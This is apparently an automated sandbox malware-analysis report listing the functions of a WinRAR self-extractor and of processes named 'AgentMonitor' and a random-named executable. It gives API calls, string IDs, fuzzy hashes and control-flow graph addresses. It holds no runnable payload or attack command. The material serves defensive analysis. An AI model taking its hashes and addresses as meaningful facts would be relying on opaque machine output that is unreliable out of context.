                                      • Opcode ID: a865a7623218500f83b7374edd7041d3d8e496fef7af9903a623ab5f110ddc64
                                      • Instruction ID: dc8ff83925d23af7ea5180ecd34eab6dda41c57ec558f4d5f0947bc5bdf820b5
                                      • Opcode Fuzzy Hash: a865a7623218500f83b7374edd7041d3d8e496fef7af9903a623ab5f110ddc64
                                      • Instruction Fuzzy Hash: DFF06D32008214BBDF221F51EC0DDCE3F2AFB80760F118405F61A5E0A1CB7296A1D690
                                      APIs
                                      • GetDC.USER32(00000000), ref: 0050A666
                                      • GetDeviceCaps.GDI32(00000000,00000058), ref: 0050A675
                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0050A683
                                      • ReleaseDC.USER32(00000000,00000000), ref: 0050A691
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1429730056.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4f0000_Internal.jbxd
                                      Similarity
                                      • API ID: CapsDevice$Release
                                      • String ID:
                                      • API String ID: 1035833867-0
                                      • Opcode ID: e91901a931ab2eac8be4715296e819104f764f61fa6f3f3f9e4a17e88fcf3378
                                      • Instruction ID: b8b40efad7369eaf427139cac2d042ebdbe1860a073e3298969b4e64ff99289e
                                      • Opcode Fuzzy Hash: e91901a931ab2eac8be4715296e819104f764f61fa6f3f3f9e4a17e88fcf3378
                                      • Instruction Fuzzy Hash: 6CE01D31952721B7D7515B607C1DB9B3E54AB25B93F010101F609951F0DB7487089B91
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1429730056.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4f0000_Internal.jbxd
                                      Similarity
                                      • API ID: _wcschr
                                      • String ID: .lnk$dP
                                      • API String ID: 2691759472-3456662748
                                      • Opcode ID: 61f896858087c115f43d6c24b7e2a17693bf508704fd7b0ece492e0b111d3475
                                      • Instruction ID: 6cac1d9d86ae12b00f9a449be385f63441eebe509da61258517f4ec24866f0d2
                                      • Opcode Fuzzy Hash: 61f896858087c115f43d6c24b7e2a17693bf508704fd7b0ece492e0b111d3475
                                      • Instruction Fuzzy Hash: 5DA1517690022A96DF24DBA0DD49EFF77FCAF44304F0885A6B509E7181EE359B848B71
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1429730056.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4f0000_Internal.jbxd
                                      Similarity
                                      • API ID: _free
                                      • String ID: *?$.
                                      • API String ID: 269201875-3972193922
                                      • Opcode ID: a43f323726f3add9ee6ade21ba1b60dabe11b9fdc077469e3faaf2e020bb5495
                                      • Instruction ID: 6a670fa4a886848874bb5fd046acd3c4ba6d96324d045bf152eab36ad8caeaf2
                                      • Opcode Fuzzy Hash: a43f323726f3add9ee6ade21ba1b60dabe11b9fdc077469e3faaf2e020bb5495
                                      • Instruction Fuzzy Hash: 95517D75E0020AAFEF14DFA8C885AEDBBB5FF98310F244169E854E7340E7359A45CB50
                                      APIs
                                      • __EH_prolog.LIBCMT ref: 004F9387
                                        • Part of subcall function 004FC29A: _wcslen.LIBCMT ref: 004FC2A2
                                      • _swprintf.LIBCMT ref: 004F9465
                                        • Part of subcall function 004F4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 004F40A5
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1429730056.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4f0000_Internal.jbxd
                                      Similarity
                                      • API ID: H_prolog__vswprintf_c_l_swprintf_wcslen
                                      • String ID: rtmp%d
                                      • API String ID: 1262143012-3303766350
                                      • Opcode ID: ed65ed2d9ca9803944de3c68cef32c05b82d772af930fbc7453700823f8a3aa4
                                      • Instruction ID: 5205fbd5e319209d9c18bd5c89ae157bd3839676b37b990c11a95b248c01136e
                                      • Opcode Fuzzy Hash: ed65ed2d9ca9803944de3c68cef32c05b82d772af930fbc7453700823f8a3aa4
                                      • Instruction Fuzzy Hash: EE41727290026D75DF21ABA18D55EFF737CAF51344F0048AAB709E3151DA3C8F899B68
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1429730056.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4f0000_Internal.jbxd
                                      Similarity
                                      • API ID: _wcschr
                                      • String ID: *
                                      • API String ID: 2691759472-163128923
                                      • Opcode ID: 46d95009d91d29d2ddc773a7241a23004416e887b760c7d01bf6cd1b03786c58
                                      • Instruction ID: f05cdf8e994ed672d0f7ff0ffe2cdb9da1bac955cba1aa1f0b59366d49edd9ca
                                      • Opcode Fuzzy Hash: 46d95009d91d29d2ddc773a7241a23004416e887b760c7d01bf6cd1b03786c58
                                      • Instruction Fuzzy Hash: DF3116261443199A9A30AE14CB0267B73E9DF93B14F14851FFF8447283E72D8C8292EA
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1429730056.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4f0000_Internal.jbxd
                                      Similarity
                                      • API ID: _abort
                                      • String ID: MOC$RCC
                                      • API String ID: 1888311480-2084237596
                                      • Opcode ID: 2f2bcd6d75f1967af082b14dac1dd4ed3b1b4902f9513178159c06be971677a7
                                      • Instruction ID: c9ac8ca6e3a172d8dbce7486bbcc14d48882cc6406f41e494dc074ae95da71c9
                                      • Opcode Fuzzy Hash: 2f2bcd6d75f1967af082b14dac1dd4ed3b1b4902f9513178159c06be971677a7
                                      • Instruction Fuzzy Hash: F3416875900209AFEF15DF98CC81AEEBFB5BF48304F188099F914A7251D335EAA0DB54
                                      APIs
                                      • __EH_prolog.LIBCMT ref: 004F7406
                                        • Part of subcall function 004F3BBA: __EH_prolog.LIBCMT ref: 004F3BBF
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1429730056.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4f0000_Internal.jbxd
                                      Similarity
                                      • API ID: H_prolog
                                      • String ID: SeRestorePrivilege$SeSecurityPrivilege
                                      • API String ID: 3519838083-639343689
                                      • Opcode ID: f548f04a21d7df1741db6f49b95d51cb7e77435d985423e245a03c9652237f6c
                                      • Instruction ID: a134b083ec6a5acf6764a36f9bd855a9eb18b40a1cbbbeb03161de0208900473
                                      • Opcode Fuzzy Hash: f548f04a21d7df1741db6f49b95d51cb7e77435d985423e245a03c9652237f6c
                                      • Instruction Fuzzy Hash: 9831EE71D0025DAADF11ABA4DC49BFF7BA8AF19304F04401AF604A7292D77C9A488B68
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1429730056.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4f0000_Internal.jbxd
                                      Similarity
                                      • API ID: _wcslen
                                      • String ID: }
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1429730056.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4f0000_Internal.jbxd
                                      Similarity
                                      • API ID: _wcslen
                                      • String ID: Software\WinRAR SFX$P
                                      APIs
                                        • Part of subcall function 004FC29A: _wcslen.LIBCMT ref: 004FC2A2
                                        • Part of subcall function 00501FDD: _wcslen.LIBCMT ref: 00501FE5
                                        • Part of subcall function 00501FDD: _wcslen.LIBCMT ref: 00501FF6
                                        • Part of subcall function 00501FDD: _wcslen.LIBCMT ref: 00502006
                                        • Part of subcall function 00501FDD: _wcslen.LIBCMT ref: 00502014
                                        • Part of subcall function 0050AC04: SetCurrentDirectoryW.KERNELBASE(?), ref: 0050AC08
                                      • _wcslen.LIBCMT ref: 0050AE8B
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1429730056.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4f0000_Internal.jbxd
                                      Similarity
                                      • API ID: _wcslen$CurrentDirectory
                                      • String ID: <P$C:\Users\user\Desktop
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1429730056.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4f0000_Internal.jbxd
                                      Similarity
                                      • API ID: Malloc
                                      • String ID: (P$ZP

                                      Execution Graph

                                      Execution Coverage:7.8%
                                      Dynamic/Decrypted Code Coverage:0%
                                      Signature Coverage:0%
                                      Total number of Nodes:3
                                      Total number of Limit Nodes:0
                                      execution_graph 7678 7ffb4b21d8b1 7679 7ffb4b21d8cf QueryFullProcessImageNameA 7678->7679 7681 7ffb4b21da74 7679->7681

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 305 7ffb4ae20d48-7ffb4ae20d9b call 7ffb4ae207d8 308 7ffb4ae20da0-7ffb4ae20e7e 305->308 320 7ffb4ae20e7f-7ffb4ae20eb9 308->320 325 7ffb4ae20ebb-7ffb4ae20eee 320->325 328 7ffb4ae20eef-7ffb4ae20f05 325->328 330 7ffb4ae20f1e 328->330 331 7ffb4ae20f07-7ffb4ae20f1d 328->331 332 7ffb4ae20f1f-7ffb4ae20f27 330->332 331->330 331->332 335 7ffb4ae20f29 332->335 335->328 336 7ffb4ae20f2b-7ffb4ae20f63 335->336 336->335 339 7ffb4ae20f65-7ffb4ae21050 336->339
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.1768482472.00007FFB4AE20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE20000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_7ffb4ae20000_AgentMonitor.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 5Y_H

                                      Control-flow Graph

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.1772602439.00007FFB4B210000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B210000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_7ffb4b210000_AgentMonitor.jbxd
                                      Similarity
                                      • API ID: FullImageNameProcessQuery
                                      • String ID:

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 405 7ffb4ae208d0-7ffb4ae208d9 407 7ffb4ae208db-7ffb4ae208e6 405->407 408 7ffb4ae20916-7ffb4ae20941 405->408 407->408 411 7ffb4ae20943-7ffb4ae20959 408->411 412 7ffb4ae208f6-7ffb4ae20904 408->412 413 7ffb4ae20905-7ffb4ae20915 411->413 416 7ffb4ae2095b-7ffb4ae20997 411->416 412->413 413->408
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.1768482472.00007FFB4AE20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE20000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_7ffb4ae20000_AgentMonitor.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: X7J

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 484 7ffb4ae20960 485 7ffb4ae20965-7ffb4ae20997 484->485
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.1768482472.00007FFB4AE20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE20000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_7ffb4ae20000_AgentMonitor.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: X7J

                                      Control-flow Graph

                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.1768482472.00007FFB4AE20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE20000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_7ffb4ae20000_AgentMonitor.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: X7J
                                      • Instruction ID: 6db386aad6bf17fdad81bc8a041dc2d4c3adc625ac0fea1f06fdb560be99d77b
                                      • Opcode Fuzzy Hash: 38e54fe49fa15eae383b72e86048e396ba71ef1e0d2bbbab247e4a4d3eb648cb
                                      • Instruction Fuzzy Hash:
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.1768482472.00007FFB4AE20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE20000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_7ffb4ae20000_AgentMonitor.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: c9$!k9$"s9$#{9
                                      • API String ID: 0-1692736845
                                      • Opcode ID: 0bdb4b08ef6dd072a53aac8ba31ce1bef71d74f03b5834344c17d8379a59499d
                                      • Instruction ID: f0d24af9354582a8bacff447595316fd0c5dbedd41495b30f0f31c9f1b29a123
                                      • Opcode Fuzzy Hash: 0bdb4b08ef6dd072a53aac8ba31ce1bef71d74f03b5834344c17d8379a59499d
                                      • Instruction Fuzzy Hash: 7251B4D7A0E22A85E1123ABDF4110FC6B489F45335B5883F3EE4D990C74E8865BB92F5

                                      Execution Graph

                                      Execution Coverage:4.5%
                                      Dynamic/Decrypted Code Coverage:100%
                                      Signature Coverage:0%
                                      Total number of Nodes:10
                                      Total number of Limit Nodes:1
                                      execution_graph 34036 7ffb4ae56f41 34037 7ffb4ae56f5f WriteFile 34036->34037 34039 7ffb4ae57027 34037->34039 34040 7ffb4ae59138 34041 7ffb4ae59143 34040->34041 34042 7ffb4ae5918b GetSystemInfo 34040->34042 34044 7ffb4ae592fe 34042->34044 34032 7ffb4ae56d65 34033 7ffb4ae56d7f CreateFileTransactedW 34032->34033 34035 7ffb4ae56e7a 34033->34035

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 566 7ffb4ae59138-7ffb4ae59141 567 7ffb4ae5918b-7ffb4ae59261 566->567 568 7ffb4ae59143-7ffb4ae59167 566->568 569 7ffb4ae59264-7ffb4ae592fc GetSystemInfo 567->569 570 7ffb4ae59263 567->570 574 7ffb4ae592fe 569->574 575 7ffb4ae59304-7ffb4ae59325 569->575 570->569 574->575

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 676 7ffb4ae56d65-7ffb4ae56df2 680 7ffb4ae56dfc-7ffb4ae56e78 CreateFileTransactedW 676->680 681 7ffb4ae56df4-7ffb4ae56df9 676->681 682 7ffb4ae56e80-7ffb4ae56eaa 680->682 683 7ffb4ae56e7a 680->683 681->680 683->682

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 685 7ffb4ae56f41-7ffb4ae56fd1 689 7ffb4ae56fdb-7ffb4ae57025 WriteFile 685->689 690 7ffb4ae56fd3-7ffb4ae56fd8 685->690 691 7ffb4ae5702d-7ffb4ae57055 689->691 692 7ffb4ae57027 689->692 690->689 692->691
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2700433545.00007FFB4AE41000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE41000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_7ffb4ae41000_yxeaYbTPMzNPCanFqSswYWhX.jbxd
                                      Similarity
                                      • API ID: FileWrite
                                      • String ID:
                                      • API String ID: 3934441357-0
                                      • Opcode ID: 2032150f1df179262d9dab586fe306d90c3d22cd089acfa29df037cffeba60c2
                                      • Instruction ID: 60468814bd5f4e99914cdb4d012b93af2479cc3d82e5f764a80585041854c398
                                      • Opcode Fuzzy Hash: 2032150f1df179262d9dab586fe306d90c3d22cd089acfa29df037cffeba60c2
                                      • Instruction Fuzzy Hash: 8E31C27190CB5C8FDB58EF98D8456F9BBE1FBA9311F00426FD049D3292CB74A8568B81
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2707072828.00007FFB4B200000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B200000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_7ffb4b200000_yxeaYbTPMzNPCanFqSswYWhX.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID: 0-3916222277
                                      • Opcode ID: a716b38957d8eeef60baffec5428ed390d28bd5f6825842bab52085eb7a4d028
                                      • Instruction ID: f5129e49b45397e42fee977d02d3dfede0106cc19f916f75f85567b822445d47
                                      • Opcode Fuzzy Hash: a716b38957d8eeef60baffec5428ed390d28bd5f6825842bab52085eb7a4d028
                                      • Instruction Fuzzy Hash: C0517CB1D0C60A9FDB49FFA8C5515EDBBB1EF59300F1081BAC10AE7296CA382906CB50
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2700433545.00007FFB4AE10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE10000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_7ffb4ae10000_yxeaYbTPMzNPCanFqSswYWhX.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: X7J
                                      • API String ID: 0-3311591319
                                      • Opcode ID: 79176f94aa97e111583e1936cc01c810336878e16cb3d962072ae04d4e7dd6d2
                                      • Instruction ID: 3333a4ba9c35c3cb8dc20ae3134ce0cbbf136305753ed91be9d7bc1ae764c5ea
                                      • Opcode Fuzzy Hash: 79176f94aa97e111583e1936cc01c810336878e16cb3d962072ae04d4e7dd6d2
                                      • Instruction Fuzzy Hash: 16415BA2A4D6754FE306BBB8E09A1FD7F84EF45324B2441FFD94EC7193CD0868528295
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2707072828.00007FFB4B200000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B200000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_7ffb4b200000_yxeaYbTPMzNPCanFqSswYWhX.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID: 0-3916222277
                                      • Opcode ID: e4122d0cef1c1a9c390d06a59bf0c7c1750bd49c602335ec7795794d261a6890
                                      • Instruction ID: 3062563eb11ffe4cf2c0db6a8136e38457f84de3e1b267980ced02b0d891ea5d
                                      • Opcode Fuzzy Hash: e4122d0cef1c1a9c390d06a59bf0c7c1750bd49c602335ec7795794d261a6890
                                      • Instruction Fuzzy Hash: 7E410EB0D0860E9FDF49EFA4C5505FEBBB1FF45304F5081B9C25AAB295CA396906CB50
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2700433545.00007FFB4AE10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE10000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_7ffb4ae10000_yxeaYbTPMzNPCanFqSswYWhX.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: X7J
                                      • API String ID: 0-3311591319
                                      • Opcode ID: d49edd1027f6e65f4ea0ef0d0fa5320480b530ee881acd2e1afc5715c7d5e9f2
                                      • Instruction ID: 5a9cffb63fa9c7b50c8c4669bed69d375604f0ed76a4ddf0e0fa6ba2c66d53ab
                                      • Opcode Fuzzy Hash: d49edd1027f6e65f4ea0ef0d0fa5320480b530ee881acd2e1afc5715c7d5e9f2
                                      • Instruction Fuzzy Hash: 213157B1A0EA6A1FF355BA7CE48A5F97BC5EF44321B6441FED80EC71D3CC1868428295
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2700433545.00007FFB4AE10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE10000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_7ffb4ae10000_yxeaYbTPMzNPCanFqSswYWhX.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: X7J
                                      • API String ID: 0-3311591319
                                      • Opcode ID: 213befb796702b3a279c7055f8bd53ebd2c39593ca9397fa89cbfea0e9b10d86
                                      • Instruction ID: af245a48f1ea8018efed116814b1432066f80bd0951944f7f5e3c736aa5e1463
                                      • Opcode Fuzzy Hash: 213befb796702b3a279c7055f8bd53ebd2c39593ca9397fa89cbfea0e9b10d86
                                      • Instruction Fuzzy Hash: DC31F3B0B1D9691FE388FE3CC09A6B57BC6EF98310B6401FDD40EC3293DC18A8428245
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2700433545.00007FFB4AE20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE20000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_7ffb4ae20000_yxeaYbTPMzNPCanFqSswYWhX.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: I
                                      • API String ID: 0-3707901625
                                      • Opcode ID: 0f60636208b9d7da48f72223a6f5c3146ee632fa96c0ea1c52570ba7d52e8b66
                                      • Instruction ID: 8715a9856d9d143fde108678bc6fa386ee7ed3c95a9e54b0230deddbe37f844c
                                      • Opcode Fuzzy Hash: 0f60636208b9d7da48f72223a6f5c3146ee632fa96c0ea1c52570ba7d52e8b66
                                      • Instruction Fuzzy Hash: D0E0EDB154E7D44FD70AEB7488698443F60AE6B25178A41EEC045CF1A3D62D8849C701
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2707072828.00007FFB4B200000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B200000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_7ffb4b200000_yxeaYbTPMzNPCanFqSswYWhX.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 3c8419611bfe55592b0e52ccd6abc878fcbd28c2ca211c7faeed36ba9d321eb5
                                      • Instruction ID: 5f690370ad21bd97e5709a0d866e3b96acea811e02f09bd1f0e5c91b836ddcf3
                                      • Opcode Fuzzy Hash: 3c8419611bfe55592b0e52ccd6abc878fcbd28c2ca211c7faeed36ba9d321eb5
                                      • Instruction Fuzzy Hash: 213287B0A1DA198FDF98FF28C99597977E1FF54310B1481B9D24EC72A2DE24AC45CB40
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2707072828.00007FFB4B200000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B200000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_7ffb4b200000_yxeaYbTPMzNPCanFqSswYWhX.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: d7ca600d09ea603b30cf0a3ddfbe75cc7ffd07b4b958fb4207bb0389a3aa5d96
                                      • Instruction ID: 38321f386acf1a0c726010a2669ce3c0de983c8d6c00e5b0285a01ac154f14bf
                                      • Opcode Fuzzy Hash: d7ca600d09ea603b30cf0a3ddfbe75cc7ffd07b4b958fb4207bb0389a3aa5d96
                                      • Instruction Fuzzy Hash: 8DF12134748819AFDB89FF2CC499E6573D2EBA8704B1540A8E10EC76B6CD29EC55CB81
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2700433545.00007FFB4AE10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE10000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_7ffb4ae10000_yxeaYbTPMzNPCanFqSswYWhX.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 335d98c78140ecc7cd7e3cce921f4542a24ea469f9cd91377458518bb7704248
                                      • Instruction ID: 973cd82c01224f201391db865d50190ccd7ba8ea30c81ac30c4862974add1702
                                      • Opcode Fuzzy Hash: 335d98c78140ecc7cd7e3cce921f4542a24ea469f9cd91377458518bb7704248
                                      • Instruction Fuzzy Hash: 2D21B63130C8184FD768FE1CE889EB977D5FB5932171501BAE59AC7226D911EC8287C1
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2707072828.00007FFB4B200000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B200000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_7ffb4b200000_yxeaYbTPMzNPCanFqSswYWhX.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: b937508c92e4af140948761cf703984682c859d203bcefb3cddc2e92b0818a83
                                      • Instruction ID: 4e6b10e65c8babc416a7853a322877937cb4515da73fb61dc6082feac2dbef19
                                      • Opcode Fuzzy Hash: b937508c92e4af140948761cf703984682c859d203bcefb3cddc2e92b0818a83
                                      • Instruction Fuzzy Hash: 6231F871A0CA4A8FDB55FF6CC9929A8FBE1FF4531071442B9D059D7286DF24B812C781
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2707072828.00007FFB4B200000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B200000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_7ffb4b200000_yxeaYbTPMzNPCanFqSswYWhX.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: b5f1780b8e12436b7ba6eddb956906f259c5629a658479b17543a64f4f064a62
                                      • Instruction ID: e6dd4dfd1080da0042cb32eec0c911b5167725dd028270823a72b54a7b91af11
                                      • Opcode Fuzzy Hash: b5f1780b8e12436b7ba6eddb956906f259c5629a658479b17543a64f4f064a62
                                      • Instruction Fuzzy Hash: 9A3139B090C98ACFEF98FF68C9555BD7BB1FF44300F50887AD62DD25A2DA28A9009741
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2707072828.00007FFB4B200000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B200000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_7ffb4b200000_yxeaYbTPMzNPCanFqSswYWhX.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 4f0f2c6c7ec1b6ab6a15a2344ab76fc00aa22aef561ea06d15a7f03a84cb0b42
                                      • Instruction ID: b73b916fba8c46fcd8b4d5a2a0bfe6584909d120eb76590350e7e8454526022d
                                      • Opcode Fuzzy Hash: 4f0f2c6c7ec1b6ab6a15a2344ab76fc00aa22aef561ea06d15a7f03a84cb0b42
                                      • Instruction Fuzzy Hash: 5F3138B090C91E8FEF98FF68C5955BD7BA1FF64300F1484BAD31BD62A1DA39A8009741
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2700433545.00007FFB4AE10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE10000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_7ffb4ae10000_yxeaYbTPMzNPCanFqSswYWhX.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 2568989ed48abf69765b85e60d9b50b314657c8e8892b23d53f65a7e824761de
                                      • Instruction ID: 863b120950af5d32a6b563c9a21f52cb0d6b061b91ae2a86bc94618b33ee843d
                                      • Opcode Fuzzy Hash: 2568989ed48abf69765b85e60d9b50b314657c8e8892b23d53f65a7e824761de
                                      • Instruction Fuzzy Hash: E731AF71A0D65A8FDB45FF78C8589B97BE0FF59310B2445FAC01AC72A3DB29A441CB40
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2707072828.00007FFB4B200000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B200000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_7ffb4b200000_yxeaYbTPMzNPCanFqSswYWhX.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: ec291f7f8292214cdf536fcbd072d5e5ed38d10572cd1d97872689f3188ec4b4
                                      • Instruction ID: a5e80eedbdf70ce45a7ff55b66f8d1354f823abdee6bcc7e0ff6a8dff1d3d488
                                      • Opcode Fuzzy Hash: ec291f7f8292214cdf536fcbd072d5e5ed38d10572cd1d97872689f3188ec4b4
                                      • Instruction Fuzzy Hash: 61315E9081C5974BEB2ABE28D5645B57F71EF46310718C6BAD3CACB4F7C81CB8458381
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2707072828.00007FFB4B200000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B200000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_7ffb4b200000_yxeaYbTPMzNPCanFqSswYWhX.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
